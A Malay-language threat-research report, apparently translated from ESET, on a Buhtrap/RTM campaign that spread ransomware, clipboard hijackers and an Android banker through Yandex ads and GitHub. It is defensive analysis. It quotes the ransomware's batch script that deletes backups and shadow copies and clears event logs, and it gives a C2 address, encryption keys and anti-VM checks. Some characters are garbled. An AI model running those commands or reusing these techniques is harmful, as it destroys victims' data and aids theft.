Untuk menyasarkan akauntan dalam serangan siber, anda boleh menggunakan dokumen kerja yang mereka cari dalam talian. Ini kira-kira yang dilakukan oleh kumpulan siber sejak beberapa bulan lalu, mengedarkan pintu belakang yang diketahui. ΠΈ , serta penyulitan dan perisian untuk mencuri mata wang kripto. Kebanyakan sasaran terletak di Rusia. Serangan itu dilakukan dengan meletakkan pengiklanan berniat jahat pada Yandex.Direct. Mangsa yang berpotensi diarahkan ke tapak web di mana mereka diminta memuat turun fail berniat jahat yang menyamar sebagai templat dokumen. Yandex mengalih keluar pengiklanan berniat jahat selepas amaran kami.
Kod sumber Buhtrap telah dibocorkan dalam talian pada masa lalu supaya sesiapa sahaja boleh menggunakannya. Kami tidak mempunyai maklumat mengenai ketersediaan kod RTM.
Dalam siaran ini, kami akan memberitahu anda cara penyerang mengedarkan perisian hasad menggunakan Yandex.Direct dan mengehoskannya di GitHub. Siaran itu akan diakhiri dengan analisis teknikal perisian hasad.
Buhtrap dan RTM kembali beroperasi
Mekanisme penyebaran dan mangsa
Pelbagai muatan yang dihantar kepada mangsa berkongsi mekanisme penyebaran yang sama. Semua fail berniat jahat yang dibuat oleh penyerang diletakkan dalam dua repositori GitHub yang berbeza.
Biasanya, repositori mengandungi satu fail berniat jahat yang boleh dimuat turun, yang sering berubah. Memandangkan GitHub membenarkan anda melihat sejarah perubahan pada repositori, kami dapat melihat perisian hasad yang diedarkan dalam tempoh tertentu. Untuk meyakinkan mangsa untuk memuat turun fail berniat jahat, tapak web blanki-shabloni24[.]ru, yang ditunjukkan dalam rajah di atas, telah digunakan.
Reka bentuk tapak dan semua nama fail berniat jahat mengikut satu konsep - borang, templat, kontrak, sampel, dll. Memandangkan perisian Buhtrap dan RTM telah digunakan dalam serangan ke atas akauntan pada masa lalu, kami menganggap bahawa strategi dalam kempen baharu adalah sama. Satu-satunya persoalan ialah bagaimana mangsa sampai ke tapak penyerang.
Jangkitan
Sekurang-kurangnya beberapa bakal mangsa yang berada di laman web ini tertarik dengan pengiklanan berniat jahat. Di bawah ialah contoh URL:
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=ΡΠΊΠ°ΡΠ°ΡΡ Π±Π»Π°Π½ΠΊ ΡΡΠ΅ΡΠ°&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
Seperti yang anda boleh lihat dari pautan, sepanduk telah disiarkan di forum perakaunan yang sah bb.f2[.]kz. Adalah penting untuk ambil perhatian bahawa sepanduk muncul di tapak yang berbeza, semuanya mempunyai id kempen yang sama (blanki_rsya), dan paling berkaitan dengan perkhidmatan perakaunan atau bantuan guaman. URL menunjukkan bahawa bakal mangsa menggunakan permintaan "muat turun borang invois", yang menyokong hipotesis kami tentang serangan disasarkan. Di bawah ialah tapak tempat sepanduk muncul dan pertanyaan carian yang sepadan.
- muat turun borang invois β bb.f2[.]kz
- contoh kontrak - Ipopen[.]ru
- sampel aduan permohonan - 77metrov[.]ru
- borang perjanjian - blank-dogovor-kupli-prodazhi[.]ru
- contoh petisyen mahkamah - zen.yandex[.]ru
- contoh aduan - yurday[.]ru
- contoh borang kontrak β Regforum[.]ru
- borang kontrak β assistentus[.]ru
- contoh perjanjian pangsapuri β ββnapravah[.]com
- contoh kontrak undang-undang - avito[.]ru
Tapak blanki-shabloni24[.]ru mungkin telah dikonfigurasikan untuk lulus penilaian visual yang mudah. Biasanya, iklan yang menunjuk ke tapak yang kelihatan profesional dengan pautan ke GitHub tidak kelihatan seperti sesuatu yang jelas buruk. Selain itu, penyerang memuat naik fail berniat jahat ke repositori hanya untuk tempoh terhad, mungkin semasa kempen. Selalunya, repositori GitHub mengandungi arkib zip kosong atau fail EXE kosong. Oleh itu, penyerang boleh mengedarkan pengiklanan melalui Yandex.Direct pada tapak yang kemungkinan besar dilawati oleh akauntan yang datang sebagai tindak balas kepada pertanyaan carian tertentu.
Seterusnya, mari kita lihat pelbagai muatan yang diagihkan dengan cara ini.
Analisis Muatan
Kronologi pengedaran
Kempen berniat jahat itu bermula pada penghujung Oktober 2018 dan aktif pada masa penulisan. Memandangkan keseluruhan repositori tersedia secara terbuka di GitHub, kami menyusun garis masa yang tepat bagi pengedaran enam keluarga perisian hasad yang berbeza (lihat rajah di bawah). Kami telah menambah baris yang menunjukkan apabila pautan sepanduk ditemui, seperti yang diukur oleh telemetri ESET, untuk perbandingan dengan sejarah git. Seperti yang anda lihat, ini berkait rapat dengan ketersediaan muatan di GitHub. Percanggahan pada akhir Februari boleh dijelaskan oleh fakta bahawa kami tidak mempunyai sebahagian daripada sejarah perubahan kerana repositori telah dialih keluar daripada GitHub sebelum kami boleh mendapatkannya sepenuhnya.
Rajah 1. Kronologi pengedaran perisian hasad.
Sijil Menandatangani Kod
Kempen menggunakan berbilang sijil. Ada yang ditandatangani oleh lebih daripada satu keluarga perisian hasad, yang seterusnya menunjukkan bahawa sampel yang berbeza adalah milik kempen yang sama. Walaupun ketersediaan kunci persendirian, pengendali tidak menandatangani binari secara sistematik dan tidak menggunakan kunci untuk semua sampel. Pada penghujung Februari 2019, penyerang mula membuat tandatangan tidak sah menggunakan sijil milik Google yang mereka tidak mempunyai kunci peribadi.
Semua sijil yang terlibat dalam kempen dan keluarga perisian hasad yang mereka tandatangani disenaraikan dalam jadual di bawah.
Kami juga telah menggunakan sijil menandatangani kod ini untuk mewujudkan pautan dengan keluarga perisian hasad yang lain. Untuk kebanyakan sijil, kami tidak menemui sampel yang tidak diedarkan melalui repositori GitHub. Walau bagaimanapun, sijil TOV "MARIYA" telah digunakan untuk menandatangani perisian hasad kepunyaan botnet , perisian iklan dan pelombong. Tidak mungkin perisian hasad ini berkaitan dengan kempen ini. Kemungkinan besar, sijil itu dibeli di darknet.
Win32/Filecoder.Buhtrap
Komponen pertama yang menarik perhatian kami ialah Win32/Filecoder.Buhtrap yang baru ditemui. Ini ialah fail binari Delphi yang kadangkala dibungkus. Ia diedarkan terutamanya pada FebruariβMac 2019. Ia berkelakuan sesuai dengan program perisian tebusan - ia mencari pemacu tempatan dan folder rangkaian serta menyulitkan fail yang dikesan. Ia tidak memerlukan sambungan Internet untuk dikompromi kerana ia tidak menghubungi pelayan untuk menghantar kunci penyulitan. Sebaliknya, ia menambah "token" pada penghujung mesej tebusan, dan mencadangkan menggunakan e-mel atau Bitmessage untuk menghubungi pengendali.
Untuk menyulitkan sebanyak mungkin sumber sensitif, Filecoder.Buhtrap menjalankan rangkaian yang direka untuk menutup perisian utama yang mungkin mempunyai pengendali fail terbuka yang mengandungi maklumat berharga yang boleh mengganggu penyulitan. Proses sasaran adalah terutamanya sistem pengurusan pangkalan data (DBMS). Selain itu, Filecoder.Buhtrap memadam fail log dan sandaran untuk menyukarkan pemulihan data. Untuk melakukan ini, jalankan skrip kelompok di bawah.
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
Filecoder.Buhtrap menggunakan perkhidmatan Logger IP dalam talian yang sah yang direka untuk mengumpul maklumat tentang pelawat laman web. Ini bertujuan untuk mengesan mangsa perisian tebusan, yang merupakan tanggungjawab baris arahan:
mshta.exe "javascript:document.write('');"
Fail untuk penyulitan dipilih jika ia tidak sepadan dengan tiga senarai pengecualian. Pertama, fail dengan sambungan berikut tidak disulitkan: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys dan .kelawar. Kedua, semua fail yang laluan penuhnya mengandungi rentetan direktori daripada senarai di bawah dikecualikan.
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
Ketiga, nama fail tertentu juga dikecualikan daripada penyulitan, antaranya nama fail mesej tebusan. Senarainya dibentangkan di bawah. Jelas sekali, semua pengecualian ini bertujuan untuk memastikan mesin berjalan, tetapi dengan kelayakan jalan yang minimum.
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
Skim penyulitan fail
Setelah dilaksanakan, perisian hasad menjana pasangan kunci RSA 512-bit. Eksponen peribadi (d) dan modulus (n) kemudian disulitkan dengan kunci awam 2048-bit berkod keras (eksponen dan modulus awam), dibungkus zlib dan dikodkan base64. Kod yang bertanggungjawab untuk ini ditunjukkan dalam Rajah 2.
Rajah 2. Hasil dekompilasi Sinar-Hex bagi proses penjanaan pasangan kunci RSA 512-bit.
Di bawah ialah contoh teks biasa dengan kunci peribadi yang dijana, iaitu token yang dilampirkan pada mesej tebusan.
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
Kunci awam penyerang diberikan di bawah.
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
Fail disulitkan menggunakan AES-128-CBC dengan kunci 256-bit. Untuk setiap fail yang disulitkan, kunci baharu dan vektor permulaan baharu dijana. Maklumat utama ditambahkan pada penghujung fail yang disulitkan. Mari kita pertimbangkan format fail yang disulitkan.
Fail yang disulitkan mempunyai pengepala berikut:
Data fail sumber dengan penambahan nilai ajaib VEGA disulitkan kepada 0x5000 bait pertama. Semua maklumat penyahsulitan dilampirkan pada fail dengan struktur berikut:
- Penanda saiz fail mengandungi tanda yang menunjukkan sama ada saiz fail lebih besar daripada 0x5000 bait
β Gumpalan kunci AES = ZlibCompress(RSAEncrypt(kunci AES + IV, kunci awam bagi pasangan kunci RSA yang dijana))
- Gumpalan kunci RSA = ZlibCompress(RSAEncrypt(kunci peribadi RSA yang dihasilkan, kunci awam RSA berkod keras))
Win32/ClipBanker
Win32/ClipBanker ialah komponen yang diedarkan secara berselang-seli dari akhir Oktober hingga awal Disember 2018. Peranannya adalah untuk memantau kandungan papan keratan, ia mencari alamat dompet mata wang kripto. Setelah menentukan alamat dompet sasaran, ClipBanker menggantikannya dengan alamat yang dipercayai milik pengendali. Sampel yang kami periksa tidak dikotak atau dikaburkan. Satu-satunya mekanisme yang digunakan untuk menutup tingkah laku ialah penyulitan rentetan. Alamat dompet operator disulitkan menggunakan RC4. Mata wang kripto sasaran ialah Bitcoin, Bitcoin tunai, Dogecoin, Ethereum dan Ripple.
Sepanjang tempoh perisian hasad merebak ke dompet Bitcoin penyerang, sejumlah kecil telah dihantar ke VTS, yang menimbulkan keraguan tentang kejayaan kempen tersebut. Selain itu, tiada bukti yang menunjukkan bahawa transaksi ini berkaitan dengan ClipBanker sama sekali.
Win32/RTM
Komponen Win32/RTM telah diedarkan selama beberapa hari pada awal Mac 2019. RTM ialah jurubank Trojan yang ditulis dalam Delphi, bertujuan untuk sistem perbankan jauh. Pada tahun 2017, penyelidik ESET menerbitkan program ini, penerangan masih relevan. Pada Januari 2019, Palo Alto Networks turut dikeluarkan .
Pemuat Buhtrap
Untuk beberapa lama, pemuat turun tersedia di GitHub yang tidak serupa dengan alat Buhtrap sebelumnya. Dia menoleh ke https://94.100.18[.]67/RSS.php?<some_id> untuk mendapatkan peringkat seterusnya dan memuatkannya terus ke dalam ingatan. Kita boleh membezakan dua tingkah laku kod peringkat kedua. Dalam URL pertama, RSS.php melepasi pintu belakang Buhtrap secara langsung - pintu belakang ini sangat serupa dengan yang tersedia selepas kod sumber dibocorkan.
Menariknya, kami melihat beberapa kempen dengan pintu belakang Buhtrap, dan ia didakwa dijalankan oleh pengendali yang berbeza. Dalam kes ini, perbezaan utama ialah pintu belakang dimuatkan terus ke dalam memori dan tidak menggunakan skema biasa dengan proses penggunaan DLL yang kami bincangkan . Di samping itu, pengendali menukar kunci RC4 yang digunakan untuk menyulitkan trafik rangkaian ke pelayan C&C. Dalam kebanyakan kempen yang telah kami lihat, pengendali tidak bersusah payah menukar kunci ini.
Tingkah laku kedua yang lebih kompleks ialah URL RSS.php telah dihantar kepada pemuat lain. Ia melaksanakan beberapa kekeliruan, seperti membina semula jadual import dinamik. Tujuan pemuat but adalah untuk menghubungi pelayan C&C [.]com/api/F27F84EDA4D13B15/2, hantar log dan tunggu jawapan. Ia memproses tindak balas sebagai gumpalan, memuatkannya ke dalam memori dan melaksanakannya. Muatan yang kami lihat melaksanakan pemuat ini adalah pintu belakang Buhtrap yang sama, tetapi mungkin terdapat komponen lain.
Android/Spy.Banker
Menariknya, komponen untuk Android juga ditemui dalam repositori GitHub. Dia berada di cawangan utama hanya sehari - 1 November 2018. Selain daripada disiarkan di GitHub, telemetri ESET tidak menemui bukti perisian hasad ini diedarkan.
Komponen tersebut dihoskan sebagai Pakej Aplikasi Android (APK). Ia sangat dikaburkan. Tingkah laku berniat jahat disembunyikan dalam JAR yang disulitkan yang terletak dalam APK. Ia disulitkan dengan RC4 menggunakan kunci ini:
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
Kunci dan algoritma yang sama digunakan untuk menyulitkan rentetan. JAR terletak di APK_ROOT + image/files. 4 bait pertama fail mengandungi panjang JAR yang disulitkan, yang bermula serta-merta selepas medan panjang.
Setelah menyahsulit fail, kami mendapati bahawa ia adalah Anubis - sebelum ini jurubank untuk Android. Malware mempunyai ciri-ciri berikut:
- rakaman mikrofon
- mengambil tangkapan skrin
- mendapatkan koordinat GPS
- keylogger
- penyulitan data peranti dan permintaan tebusan
- menghantar spam
Menariknya, jurubank itu menggunakan Twitter sebagai saluran komunikasi sandaran untuk mendapatkan pelayan C&C yang lain. Sampel yang kami analisis menggunakan akaun @JonesTrader, tetapi pada masa analisis ia telah disekat.
Jurubank mengandungi senarai aplikasi sasaran pada peranti Android. Ia lebih panjang daripada senarai yang diperoleh dalam kajian Sophos. Senarai itu termasuk banyak aplikasi perbankan, program beli-belah dalam talian seperti Amazon dan eBay, dan perkhidmatan mata wang kripto.
MSIL/ClipBanker.IH
Komponen terakhir yang diedarkan sebagai sebahagian daripada kempen ini ialah .NET Windows executable, yang muncul pada Mac 2019. Kebanyakan versi yang dikaji telah dibungkus dengan ConfuserEx v1.0.0. Seperti ClipBanker, komponen ini menggunakan papan keratan. Matlamatnya ialah pelbagai jenis mata wang kripto, serta tawaran di Steam. Selain itu, dia menggunakan perkhidmatan IP Logger untuk mencuri kunci WIF peribadi Bitcoin.
Mekanisme Perlindungan
Sebagai tambahan kepada faedah yang disediakan oleh ConfuserEx dalam mencegah penyahpepijatan, lambakan dan gangguan, komponen tersebut termasuk keupayaan untuk mengesan produk antivirus dan mesin maya.
Untuk mengesahkan bahawa ia berjalan dalam mesin maya, perisian hasad menggunakan baris arahan Windows WMI (WMIC) terbina dalam untuk meminta maklumat BIOS, iaitu:
wmic bios
Kemudian program menghuraikan output arahan dan mencari kata kunci: VBOX, VirtualBox, XEN, qemu, bochs, VM.
Untuk mengesan produk antivirus, perisian hasad menghantar permintaan Instrumentasi Pengurusan Windows (WMI) ke Pusat Keselamatan Windows menggunakan ManagementObjectSearcher API seperti yang ditunjukkan di bawah. Selepas penyahkodan dari base64 panggilan kelihatan seperti ini:
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
Rajah 3. Proses untuk mengenal pasti produk antivirus.
Di samping itu, perisian hasad menyemak sama ada , alat untuk melindungi daripada serangan papan keratan dan, jika berjalan, menangguhkan semua rangkaian dalam proses itu, dengan itu melumpuhkan perlindungan.
Kegigihan
Versi perisian hasad yang kami pelajari menyalin dirinya sendiri %APPDATA%googleupdater.exe dan menetapkan atribut "tersembunyi" untuk direktori google. Kemudian dia menukar nilai SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell dalam pendaftaran Windows dan menambah laluan updater.exe. Dengan cara ini, perisian hasad akan dilaksanakan setiap kali pengguna log masuk.
Tingkah laku jahat
Seperti ClipBanker, perisian hasad memantau kandungan papan keratan dan mencari alamat dompet mata wang kripto, dan apabila ditemui, menggantikannya dengan salah satu alamat pengendali. Di bawah ialah senarai alamat sasaran berdasarkan apa yang terdapat dalam kod.
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
Untuk setiap jenis alamat terdapat ungkapan biasa yang sepadan. Nilai STEAM_URL digunakan untuk menyerang sistem Steam, seperti yang dapat dilihat daripada ungkapan biasa yang digunakan untuk mentakrifkan dalam penimbal:
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
Saluran penapisan
Selain menggantikan alamat dalam penimbal, perisian hasad menyasarkan kunci WIF peribadi dompet Bitcoin, Bitcoin Core dan Electrum Bitcoin. Program ini menggunakan plogger.org sebagai saluran exfiltration untuk mendapatkan kunci peribadi WIF. Untuk melakukan ini, pengendali menambah data kunci peribadi pada pengepala HTTP Ejen Pengguna, seperti yang ditunjukkan di bawah.
Rajah 4. Konsol IP Logger dengan data output.
Operator tidak menggunakan iplogger.org untuk mengeluarkan dompet. Mereka mungkin menggunakan kaedah yang berbeza kerana had 255 aksara dalam medan User-Agentdipaparkan dalam antara muka web IP Logger. Dalam sampel yang kami kaji, pelayan output yang lain disimpan dalam pembolehubah persekitaran DiscordWebHook. Yang menghairankan, pembolehubah persekitaran ini tidak diberikan di mana-mana dalam kod. Ini menunjukkan bahawa perisian hasad masih dalam pembangunan dan pembolehubah ditetapkan kepada mesin ujian pengendali.
Terdapat satu lagi tanda bahawa program itu dalam pembangunan. Fail binari termasuk dua URL iplogger.org, dan kedua-duanya ditanya apabila data dieksfiltrasi. Dalam permintaan kepada salah satu URL ini, nilai dalam medan Perujuk didahului oleh "DEV /". Kami juga menemui versi yang tidak dibungkus menggunakan ConfuserEx, penerima untuk URL ini dinamakan DevFeedbackUrl. Berdasarkan nama pembolehubah persekitaran, kami percaya bahawa pengendali merancang untuk menggunakan perkhidmatan Discord yang sah dan sistem pemintasan webnya untuk mencuri dompet mata wang kripto.
Kesimpulan
Kempen ini adalah contoh penggunaan perkhidmatan pengiklanan yang sah dalam serangan siber. Skim ini menyasarkan organisasi Rusia, tetapi kami tidak akan terkejut melihat serangan sedemikian menggunakan perkhidmatan bukan Rusia. Untuk mengelakkan kompromi, pengguna mesti yakin dengan reputasi sumber perisian yang mereka muat turun.
Senarai lengkap penunjuk kompromi dan atribut MITRE ATT&CK tersedia di .
Sumber: www.habr.com